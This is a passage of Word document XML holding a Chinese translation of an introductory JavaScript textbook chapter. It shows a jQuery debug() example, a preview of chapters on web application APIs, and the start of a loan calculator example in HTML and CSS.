      </w:r>
      <w:r>
        <w:t>定义了一套灵巧易用的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，用来操控文档内容、样式和行为。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>经过了完整的测试，在所有现代主流浏览器，甚至在</w:t>
      </w:r>
      <w:r>
        <w:t>IE6</w:t>
      </w:r>
      <w:r>
        <w:t>这种早期浏览器中都可以照常运行</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>代码非常易于识别，因为它充分利用了一个名为</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>的函数。这里用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>重写了上文中提到的</w:t>
      </w:r>
      <w:r>
        <w:t>debug()</w:t>
      </w:r>
      <w:r>
        <w:t>函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function debug(msg){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var log=$("#debuglog");//</w:t>
      </w:r>
      <w:r>
        <w:t>找到要显示</w:t>
      </w:r>
      <w:r>
        <w:t>msg</w:t>
      </w:r>
      <w:r>
        <w:t>的元素</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(log.length==0){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果不存在则创建之</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>log=$("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>div id='debuglog'</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Debug Log</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/div</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>log.appendTo(document.body);//</w:t>
      </w:r>
      <w:r>
        <w:t>并将其追加到</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>里</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>log</w:t>
      </w:r>
      <w:r>
        <w:t>.append($("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>pre/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>").text(msg));//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>msg</w:t>
      </w:r>
      <w:r>
        <w:t>包装在＜</w:t>
      </w:r>
      <w:r>
        <w:t>pre</w:t>
      </w:r>
      <w:r>
        <w:t>＞中，再追加到</w:t>
      </w:r>
      <w:r>
        <w:t>log</w:t>
      </w:r>
      <w:r>
        <w:t>里</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目前我们所提到的第二部分的</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>章都是围绕网页展开讨论的。后续的</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>章将着眼点转向</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用。这几章的内容并不是讨论如何通过编写操控内容、样式和行为的脚本使用</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器来渲染文档；而是讲解如何将</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器当做应用平台，并描述了用以支持更复杂精细的客户端</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用的现代浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。第</w:t>
      </w:r>
      <w:r>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:t>章讲解如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>来发起</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求。第</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t>章描述数据存储的机制以及客户端应用中的会话状态的</w:t>
      </w:r>
      <w:r>
        <w:t>保持。第</w:t>
      </w:r>
      <w:r>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:t>章涵盖基于</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>的＜</w:t>
      </w:r>
      <w:r>
        <w:t>vanvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签的客户端</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，用来进行任意形状图形的绘制。最后，第</w:t>
      </w:r>
      <w:r>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:t>章讲解</w:t>
      </w:r>
      <w:r>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>TML5</w:t>
      </w:r>
      <w:r>
        <w:t>所提供的新一代</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。网络、存储、图形：这些都是</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器提供的操作系统级的服务，它们定义了全新的跨平台的应用环境。如果你正在进行基于那些支持这些新</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器的开发，这将是你作为客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序员最激动人心的时刻。最后</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>章并没有太多示例代码，但下面的例子使用了这些新的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="Shi_Li__Yi_Ge_JavaScriptDai_Kuan_Ji_Suan"/>
      <w:r>
        <w:t>示例：一个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>贷款计算器</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本章最后展示一个例子，这个例子集中使用</w:t>
      </w:r>
      <w:r>
        <w:t>了诸多技术，展示了真实环境下的客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>（包括</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>）编程。例</w:t>
      </w:r>
      <w:r>
        <w:t>1-1</w:t>
      </w:r>
      <w:r>
        <w:t>给出了一个简单的贷款计算器应用的代码，如图</w:t>
      </w:r>
      <w:r>
        <w:t>1-2</w:t>
      </w:r>
      <w:r>
        <w:t>所示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>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4050101" cy="2014267"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="2" name="00002.jpeg" descr="000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2.jpeg" descr="00002.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4050101" cy="2014267"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>1-2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　一个贷款计算器</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在看代码（例</w:t>
      </w:r>
      <w:r>
        <w:t>1-1</w:t>
      </w:r>
      <w:r>
        <w:t>）之前应当先仔细阅读本段文字。你不需要理解所有内容，代码中有着完整的注释，至少你应该能正确运行这段代码得到如图</w:t>
      </w:r>
      <w:r>
        <w:t>1-2</w:t>
      </w:r>
      <w:r>
        <w:t>所示的界面。这里的例子展示了诸多</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言核心特性，同样展示了重要的客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>技术：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如何在文档中查找元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如何通过表单</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>元素来获取用户的输</w:t>
      </w:r>
      <w:r>
        <w:t>入数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如何通过文档元素来设置</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如何将数据存储在浏览器中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如何使用脚本发起</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如何利用＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素绘图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>1-1</w:t>
      </w:r>
      <w:r>
        <w:t>：基于</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>实现的贷款计算器</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title</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript Loan Calculator</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/title</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t>这是一个</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式表</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>定义了程序输出的样式</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>.output{font-weight:bold;}/*</w:t>
      </w:r>
      <w:r>
        <w:t>计算结果定义为粗体</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#payment{text-decoration:underline;}/*</w:t>
      </w:r>
      <w:r>
        <w:t>定义</w:t>
      </w:r>
      <w:r>
        <w:t>id="payment"</w:t>
      </w:r>
      <w:r>
        <w:t>的元素样式</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#graph{border:solid black 1px;}/*</w:t>
      </w:r>
      <w:r>
        <w:t>图表有一个</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>像素的边框</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>th,td{vertical-align:top;}/*</w:t>
      </w:r>
      <w:r>
        <w:t>表格单元格对其方式为顶端对齐</w:t>
      </w:r>
      <w:r>
        <w:t>*/</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>这是一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表格，其中包含＜</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素可以用来输入数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>程序将在＜</w:t>
      </w:r>
      <w:r>
        <w:t>span</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素中显示计算结果，这些元素都具有类似</w:t>
      </w:r>
      <w:r>
        <w:t>"interset"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"years"</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>这些</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>将在表格下面的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码中用到。我们注意到，有一些</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>元素定义了</w:t>
      </w:r>
      <w:r>
        <w:t>"onchange"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"onclick"</w:t>
      </w:r>
      <w:r>
        <w:t>的事件处理程序，以便用户在输入数据或者点击</w:t>
      </w:r>
      <w:r>
        <w:t>inputs</w:t>
      </w:r>
      <w:r>
        <w:t>时</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>执行指定的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>table</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Enter Loan Data:</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/th</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>td</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/td</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Loan Balance,Cumulative Equity,and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Interest Payments</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/th</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>td</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Amount of the loan($):</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/td</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>td</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>input id="amount"onchange="calculate();"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/td</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>td rowspan=8</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas id="graph"width="400"height="250"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/td</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>td</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Annual interest(%):</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/td</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>td</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">input </w:t>
      </w:r>
      <w:r>
        <w:t>id="apr"onchange="calculate();"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/td</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>td</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Repayment period(years):</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/td</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>td</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>input id="years"onchange="calculate();"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/td</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>td</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Zipcode(to find lenders):</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/td</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>td</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>input id="zipcode"onchange="calculate();"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/td</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
